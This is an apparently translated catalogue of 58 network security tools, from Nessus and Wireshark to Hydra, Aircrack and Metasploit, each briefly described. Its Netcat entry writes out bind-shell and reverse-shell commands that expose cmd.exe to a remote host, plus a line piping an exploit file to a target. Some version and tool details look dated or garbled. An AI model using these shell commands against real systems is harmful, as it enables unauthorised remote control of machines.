1. Nessus is a main tool for scanning UNIX vulnerabilities and later made its way to Windows. Its primary functions include local and remote security audits, supporting a client/server structure, featuring a GTK graphical interface, and supporting plugin scripting. It is free and open-source.
2. Wireshark When mentioning Wireshark, one must speak of Ethereal, which, along with Windowsâ sniffer pro, are known as the twin giants of network sniffing tools. Unlike sniffer pro, Ethereal is more widely used in Linux-like systems. Wireshark is the subsequent version of Ethereal, released after Ethereal was acquired, as the latest network sniffer software. It is a powerful tool for capturing network data, allowing you to analyze network traffic and quickly pinpoint the sources of issues such as worms, trojans, and ARP spoofing.
3. Snort Snort is a free, cross-platform sniffer, logger, and intrusion detector for monitoring small TCP/IP networks. It can run on Linux/UNIX and Windows. Snort has three operating modes: sniffer, packet logger, and network intrusion detection system. In sniffer mode, Snort reads packets from the network and displays them on the console. For example, to print TCP/IP header information on the screen, use the command: snort -v
4. Netcat Netcat is dubbed the âSwiss Army knife,â a simple yet useful tool for reading and writing data across network connections using the TCP or UDP protocol. It is designed to be a stable backdoor tool and a powerful network debugging and exploration utility. 1) Example: Command to connect to TCP port 80 on 192.168.x.x: nc -nvv 192.168.x.x 80
- Listen to TCP port 80 on the local machine: nc -l -p 80
- Scan all ports from TCP 80 to TCP 445 on 192.168.x.x: nc -nvv -w2 -z 192.168.x.x 80-445
- Bind to REMOTE hostâs CMD SHELL on REMOTE hostâs TCP port 5354 REMOTE host bind SHELL: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 5) REMOTE host bind SHELL and reverse connect, e.g., bind remote hostâs CMD SHELL and reverse connect to TCP port 5354 on 192.168.x.x the command: nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 6) For attack use, example: Connect to port 80 on 192.168.x.x and send content âc:\exploit.txtâ through its pipeline: Format 1: type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 Format 2: nc -nvv 192.168.x.x 80 < c:\exploit.txt 7) Use as a honeypot, example: Use â-Lâ (note L is uppercase) to keep listening on a port until ctrl+c Format: nc -L -p 80
5. Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a reliable platform for penetration testing, shellcode writing, and vulnerability research. The framework is mainly written in the object-oriented Perl programming language, with optional components written in C, assembly, and Python. The Metasploit Framework serves as a supporting tool for buffer overflow testing, as well as a vulnerability exploitation and testing platform. It integrates common overflow vulnerabilities and popular shellcode across platforms and is constantly updated, making buffer overflow testing convenient and simple.
6. Hping2 Hping2 is a network exploration tool and a super variant of ping. This small tool can send custom ICMP, UDP, and TCP packets and receive all feedback information. For example, you can set the time interval, packet sending frequency (-i uX X is in microseconds), with the command: hping2 192.168.0.1 -c 2 -i u1000
7. Kismet Kismet is a Linux-based wireless network scanner, a fairly handy tool that detects target WLANs by measuring surrounding wireless signals. When Kismet operates, it displays the wireless networks it found in the area. The âNameâ column shows the SSID value of the AP in the WLAN, and the initially set target WLAN should be included among them. In this row, the value of the CH column (the channel used by the AP) should be the same as initially recorded. The information displayed on the far right of the window is the number of WLANs discovered by Kismet, the number of data packets captured, and the number of encrypted data packets, etc. Even if the target computer is turned off, Kismet can detect packets from our target AP, as the target AP continuously emits âbeacons,â informing computers with wireless cards of the presence of an AP in range.
8. Tcpdump Based on Linux, TcpDump can completely intercept the âheadâ of data packets transmitted over the network for analysis. It supports filtering on network layers, protocols, hosts, networks, or ports and provides logical statements like and, or, not to help you eliminate useless information. Tcpdump is a free network analysis tool, especially due to its open-source code, which provides strength in extensibility, making it very useful for network maintenance and intruders.
9. Cain and Abel is a password recovery tool for the Windows platform. It adopts multiple methods to recover various passwords, which include: sniffing networks, using dictionary, brute-force, and cryptanalysis methods to crack decrypted passwords, recording VoIP sessions, decoding scrambled passwords, recovering wireless network keys, revealing passwords entered in password boxes (password viewing), exposing buffered passwords, and analyzing routing protocols. This tool does not exploit any software vulnerabilities or defects, instead it exploits the security issues inherent in protocol standards, authentication methods, and buffering mechanisms to simply recover passwords and credentials from various programs. The software is composed of two parts: Cain and Abel. Cain (Cain.exe) is the programâs main graphical interface, while Abel is a Windows service consisting of the files Abel.exe and Abel.dll.
10. John the Ripper is software used to attempt cracking cleartext from known ciphertext. The latest current version is JOHN 1.4, which supports cracking ciphertext employing DES and MD5 encryption methods. It can work on different machine types and operating systems.
11. Ettercap was initially designed as a sniffer for swapped networks, but as it evolved, it gained more and more features, now serving as an effective and flexible man-in-the-middle attack tool. It supports both active and passive protocol analysis and includes many network and host features (like OS fingerprints) analyses. Ettercap has five sniffing operating modes: (1) IPBASED: An IP address-based sniffing mode where Ettercap captures packets according to the source IP-PORT and destination IP-PORT. (2) MACBASED: A mode based on MAC addresses where Ettercap captures packets based on source MAC and destination MAC. (3) ARPBASED: In ARP spoofing mode, Ettercap utilizes ARP spoofing to listen to the communication (full duplex) between two hosts on the switched local area network. (4) SMARTARP: In SMARTARP mode, Ettercap uses ARP spoofing to listen to the communication (full duplex) between a host and all other known hosts on the switched network (hosts present in the host table). (5) PUBLICARP: In PUBLICARP mode, Ettercap employs ARP spoofing to monitor (half duplex) the communication between a host and all other hosts on the switched network.
12. Nikto is an open-source and powerful web scanning assessment software that tests web servers for multiple security issues. It can scan over 2,600 potentially dangerous files, CGI, and other issues on more than 230 types of servers. It can scan the web type of the specified host, host name, specific directory, COOKIE, specific CGI vulnerabilities, HTTP mode allowed by the host, and more. It uses the LibWhisker library, but generally updates more frequently than Whisker. Nikto is one of the essential web auditing tools for network security personnel.
13. Ping/telnet/dig/traceroute/whois/netstat: The most basic security commands.
14. OpenSSH / PuTTY / SSH SSH (Secure Shell) is now commonly used to log into remote computers or execute commands on them. It provides encrypted communication for untrusted computers over insecure networks, replacing unreliable telnet/rlogin/rsh interactions. Most UNIX users utilize the open-source OpenSSH server and client programs. Windows users prefer the free PuTTY client, which can also run on various mobile devices. Some Windows users also like using terminal-based OpenSSH emulation programs, such as Cygwin.
15. THC Hydra If someone needs to perform a brute-force attack on a remote authentication service, Hydra is often the tool of choice. It can quickly perform dictionary-based attacks on more than 30 ports, including telnet, ftp, http, https, smb, various databases, and other services. Like THC Amap, Hydra comes from the non-profit organization THC.
16. Paros proxy is an intermediary set between the attackerâs browser and the target website. All requests and responses are sent to it, allowing hackers to carefully study these packet details, including variables transmitted within web pages, which can then be modified and resent. The proxy is feature-rich, with website vulnerability scanning and detection capabilities, and can test common web application attacks, even detecting unsafe web components.
17. Dsniff is an advanced password sniffer and one of the first tools to extend the traditional sniffer concept into a listening tool. It injects crafted packets into the network and redirects communication data to the attackerâs machine. This way, Dsniff allows attackers to eavesdrop on data within a switched network environment, even when the attacker and target are not on the same LAN, enabling the collection of desired data. It supports application protocols such as telnet, ftp, smtp, pop, imap, and http. 18. NetStumbler NetStumbler is a specialized tool for finding wireless access points (APs) and is currently the most popular wireless search tool. Once started, it automatically displays any nearby detected wireless APs and shows information such as their SSID, MAC address, frequency band, speed, and whether they are encrypted. Notably, NetStumbler can display wireless APs with hidden SSIDs on the software interface, showing the APâs green light continuously flashing. It presents all nearby wireless APs due to a comprehensive scan, leaving no nearby wireless AP undiscovered. Since it is developed by Americans, it can only scan 11 bands between 1 and 11, compared to Chinaâs 13 bands, hence wireless APs on bands 12â13 will not be found.
19. THC Amap can detect which program is listening on a particular port. Due to its unique version detection feature, its database is not as large as Nmapâs. If Nmap fails to detect a service or other software is ineffective, consider using Amap. Another feature of Amap is that it can parse Nmap output files. This is another valuable tool contributed by THC.
20. GFI LANguard Enterprise network vulnerability managementâs three primary challenges are network scanning, network auditing, and patch management. GFI LANguard Network Security Scanner (N.S.S.) is an award-winning solution capable of scanning, detecting, evaluating, and remediating any security vulnerabilities within a network. As an administrator, you often handle various issues, sometimes using multiple products separately for network vulnerabilities, patch management, and network auditing. With GFI LANguard N.S.S., the three primary challenges of vulnerability management can be addressed through a single control panel with comprehensive reporting capabilities.
21. Aircrack Aircrack is a suite of tools for cracking WEP and WPA keys, often used for obtaining unauthorized access to wireless networks. Once enough encrypted packets are collected, it can crack 40 to 512-bit WEP keys and can also break into WPA1 or WPA2 networks using advanced encryption methods or brute-force attacks.
22. Superscan SuperScan, developed by Foundstone, is a free yet highly powerful tool. It is both a hacker tool and a network security tool compared to many similar tools. A hacker can use its denial-of-service (DoS) attacks to gather information about remote network host systems. As a security tool, SuperScan can help you uncover vulnerabilities within your network.
23. Netfilter In simple terms, Netfilterâs architecture places several checkpoints (HOOKS) throughout the network process, and processing functions (such as packet filtering, NAT, or even custom functions) are registered at each checkpoint.
24. Sysinternals is a suite of security management tools that include: (1) Process Explorer: A process management tool that can completely replace the systemâs built-in task manager (taskmgr) to become the default âtask manager.â Its various monitors intuitively display the current system status, and itâs very easy to use. It supports systems above XP and Win2003. (2) PsTools: A set of 12 commands for remotely managing Windows NT/2000/XP systems. It can remotely organize hard drives, stop the messenger service on remote computers, check hard drive space on servers, view processes on remote computers, terminate suspicious processes, send messages, and quickly shut down remote computers, among others. (3) Autoruns: A powerful and comprehensive startup scanning tool! (4) TCPView: A very small, yet highly useful port detection software. (5) RootkitRevealer checks if the Windows system is running any rootkits by analyzing registry and system API file discrepancies. It can detect all rootkits released by www.rootkit.com, such as AFX, Vanquish, HackerDefender, etc. (Note: RootkitRevealer cannot detect rootkits without hidden files or registry entries, like FU_Rootkit).
25. Retina has been recognized as the most accurate non-intrusive network security scanner. It includes the most comprehensive security vulnerabilities database maintained by eEyeâs research team. As a professional security software, Retina is used by many of the worldâs largest companies and government departments to detect network security, identifying and correcting hidden vulnerabilities and unsafe settings in their networks.
26. Perl / Python / Ruby Perl is older than Ruby or Python. Perl was once the most popular scripting language and was considered essential for hackers. It can handle complex data processing with just a few lines, running speed that isnât much slower than Câs and built-in support for regular expressions and data structures thatâs impressive. Many websites were previously written in Perl. Even now, some older websites abroad still have portions of their code in Perl. Perlâs strongest point is its countless library support, forming whatâs likely the worldâs largest programming community. You can find libraries for nearly anything you want to do. However, Perlâs drawback is also significant: Its programs are incredibly flexible, with many solutions to a problem, similar to having many ways to say the same thing, and its syntax can be completely foreign to those unfamiliar with it. Ruby and Python emerged as alternatives to Perl. Perlâs latest versions added object-oriented support, and Ruby and Python offer even better object-oriented support (even better than Java).
27. L0phtcrack L0phtCrack v5.04, referred to as LC 5, is a must-have tool for network administrators used to check if Windows, UNIX users use insecure passwords. It is also the best and fastest tool for cracking administrator account passwords on Win NT/2000/XP/UNIX. It has been proven that simple or easily cracked admin passwords pose one of the greatest security risks, as attackers can often log in as legitimate users undetected.
28. Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery, and packet sniffer. It provides a variety of interactive features for generating, manipulating, sending, sniffing, responding to, and matching packets.
29. Sam Spade offers a friendly GUI to conveniently complete various network query tasks. It was developed with the intention of tracking down spammers but is also used for other extensive network exploration, management, and security-related tasks, including tools like ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, and website search, forming an integrated toolbox.
30. GnuPG / PGP With the development of the internet and computer technologies, the security of data storage and data exchange has become increasingly important. Encryption technology has long been used to secure data storage and exchange. To ensure the accuracy of identities during network data exchanges, the visa system has matured. GnuPG is a suite for encrypting data and creating certificates; its function is similar to PGP, though PGP uses many patented algorithms.
31. Airsnort exploits the widespread flaws of the network encryption system âWi-fiâ (or 802.11b) to gain network access, though no encryption system has yet been broken by AirSnort or WEPCrack. The creators of AirSnort believe many network users fail to recognize or understand the flaws in Wi-fi encryption systems.
32. BackTrack is a live boot and run CD based on Slackware and SLAX, containing a suite of security and computer forensics tools. It was created by merging Auditor Security Linux and WHAX (formerly Whoppix).
33. P0f is a passive remote operating system identification tool following Nmap and Xprobe2. It supports: reverse connection SYN mode, forward connection SYN+ACK mode, empty connection RST+ mode, fragmented ACK mode. It can also detect: if a system is running behind a firewall, in NAT mode, load balancing mode, remote system uptime, and DSL and ISP information of the remote system.
34. Google: Everybodyâs favorite search engine.
35. WebScarab: A proxy software including proxy, web crawler, web spider, session analysis, automatic script interface, fuzz testing tool, encoding/decoding of all popular formats, service description languages and parsers, etc.
36. Ntop: NTOP can associate port usage with applications, similar to the ânetstat -anâ command effect, and show details such as port open times, port traffic, etc. For instance, it can associate TCP/UDP ports open on the local machine with applications.
37. Tripwire is the most famous Unix file system integrity check software, using the technical core of generating a digital signature for each monitored file and preserving it. If the current fileâs digital signature does not match the preserved signature, it indicates modification.
38. Ngrep is a network version of grep (a tool for searching strings within text), seeking more grep features and is used to search specified packets. As installing Ngrep requires the libpcap library, it supports a wide range of operating systems and network protocols. It can identify TCP, UDP, and ICMP packets and understand bpf filtering mechanisms.
39. Nbtscan is a small tool for scanning NetBIOS information on Windows networks but can only be used on a local network. It can display IP, host names, user names, and MAC addresses, among other data.
40. WebInspect is considered a next-generation web application security testing tool. Its main functions include: (1) Utilizing innovative assessment techniques to check the security of web services and web applications; (2) Automatically performing web application security testing and assessments; (3) Conducting application security testing and collaborations throughout the lifecycle; (4) Running interactive scans with a cutting-edge user interface; (5) Performing penetration tests using advanced tools (HP Security Toolkit); (6) Configuring to support any web application environment.
41. OpenSSL SSL stands for Secure Socket Layer, providing encrypted transmission on the Internet. The OpenSSL software package is divided into three main functionality sections: Cryptographic Algorithm Library, SSL Protocol Library, and applications.
42. Xprobe2 Xprobe2 uses statistical analysis of fuzzy matrix probes to actively detect ICMP packetsâ characteristics, determining the type of remote operating systems.
43. EtherApe is a network sniffer with functionalities equivalent to Tcpdump, but with a more user-friendly interface. Both EtherApe and Tcpdump rely on the pcap library (libpcap); thus, they share many similar features (such as using the same filtering rules and keywords). EtherApe and other graphical network sniffers use the same.
44. Core Impact is recognized as the strongest vulnerability detection tool, offering comprehensive evaluation, detection, prevention, and response to information security threats. It replicates real-world attacks on network servers, workstations, and end-user systems, assisting in finding and fixing security issues.
45. IDA Pro is an interactive âanalyst,â though it doesnât automatically solve problems. IDA Pro finds instructions suspicious but doesnât resolve these issues. Your job is to instruct IDA on how to proceed.
46. SolarWinds is a professional network management software, capable of monitoring and discovering network devices. It includes the following tools: 1. Network Performance Monitoring: Bandwidth Measurement, Router CPU Load, Bandwidth Monitoring, CPU Measurement, Network Performance Monitor, SNMP Image, and Advanced CPU Upload. 2. Network Discovery: Subnet List, Ping Sweep, and IP Network Browser, DNS Check, IP Address Management, MAC Address Discovery, SNMP Sweep, Network Location. 3. Cisco Networking Tools: IP Network Browser, Router CPU Load, Configuration Download, Configuration Upload, Configuration Editor/Browser, Proxy Ping, Compare Running vs Startup Configurations, Router Password Encryption, CPU Measurement, Router Security Check, and Advanced CPU Upload. 4. Network Monitoring: Watch It!, Network Monitor, Syslog Server, Router CPU Load, Advanced Ping, and Network Performance Monitor. 5. IP Address Management: Advanced Subnet Calculator, DNS / Who Is Resolver, DHCP Scope Monitor, DNS Check, IP Address Management, Ping Sweep. 6. Security: Router Security Check, TCP Reset, Dictionary Editor, SNMP Brute Force Attack, SNMP Dictionary Attack, Router Password Encryption. 7. Ping & Diagnostic: ping, Advanced Ping, Trace Route, Proxy Ping, Ping Sweep. 8. MIB Browser: MIB Walk, System MIBs Update, MIB Browser, MIB Browser and SNMP Image. 9. Others: TFTP Server, WAN Killer, Wake-On-Line.
47. Pwdump: A tool used to extract Windows user password files.
48. LSoF Full name âlist opened files,â meaning to list files already opened in the system. We know that everything in the Linux environment is a file: devices are files, directories are files, even sockets are files. Thus, making good use of the lsof command is very helpful in daily Linux management.
49. RainbowCrack is a multifaceted password cracking software capable of decrypting passwords and is a powerful cryptographic algorithm decryption tool. For example, it can crack im, md5, sha1, customizable, etc. Other encryption methods can also be added to the software. The software supports both Windows and Linux systems, and the tables generated on one system can be directly transferred for use on the other. Though it is powerful, it is quite complex to use.
50. Firewalk is a Linux network security tool that analyzes IP packet responses using traceroute-like technology, thus determining gateway access control lists and mapping networks.
51. Angry IP Scanner is a convenient IP and port scanning tool. It can obtain the ping response time, host name, computer name, workgroup, login username, MAC address, TTL, NetBios information of a machine being scanned; it can also specify scanning ports and view open ports on the target computer. You can perform operations like opening in an explorer, browsing with a web browser, FTP, telnet, ping, tracert, or geo-locating the specified IP for active hosts. Angry IP Scanner can automatically resolve the IP address of a single URL or hostname to begin scanning. It also supports automatically selecting and scanning entire B and C class IP ranges, managing commonly used IPs, and exporting scanning results in various file formats. By employing multi-threaded scanning, Angry IP Scanner can initiate scans on dozens of IPs simultaneously, making it very fast.
52. RKHunter, known as âRootkit Hunter,â can detect approximately 58 known rootkits and some sniffers and backdoor programs. It confirms if a machine is infected with rootkits by performing a series of test scripts.
53. Ike-scan is a tool for checking the transmission characteristics of IKE (Internet Key Exchange) services. IKE is the mechanism for establishing connections between V** networksâ servers and remote clients. After scanning a V** serverâs IP address, it distributes modified IKE packets to each host in the V** network. Any host running IKE will respond to confirm its existence. This tool then records and displays these feedback packets, comparing them against a range of known V** product fingerprints.
54. Arpwatch ARP (Address Resolution Protocol) resolves the IP to the hardware address of a network device. In a Linux system, Arpwatch listens to ARP packets on the local network and records them, reporting any changes detected via e-mail.
55. KisMAC is a free wireless protocol sniffing program for Mac OS. Upon installation, KisMACâs application alters file permissions insecurely, allowing a local attacker to exploit the vulnerability to unauthorized access to sensitive file information.
56. OSSEC HIDS is an open-source intrusion detection system, including log analysis, thorough detection, and rootkit detection. As a HIDS, OSSEC should be installed on a monitored system. Sometimes a complete version of OSSEC isnât necessary; if multiple computers have OSSEC installed, they can run in a client/server mode. Clients send data back to the server for analysis, enabling monitoring of multiple systems from one computer. This is a valuable solution for both enterprise and home users. OSSECâs main advantage is its capability to run on almost any operating system, such as Windows, Linux, OpenBSD/FreeBSD, and MacOS. However, a Windows client cannot perform rootkit detection, while clients on other systems can.
57. Openbsd PF is a favorite firewall tool among OpenBSD users. It offers network address translation, TCP/IP communication management, bandwidth control, and packet prioritization. It has additional features like passive OS detection. PF is created by the same group that wrote OpenBSD, having undergone careful evaluation, design, and coding to avoid exposing vulnerabilities similar to those in other packet filters.
58. Nemesis: Can be used to construct almost any type of ICMP packet.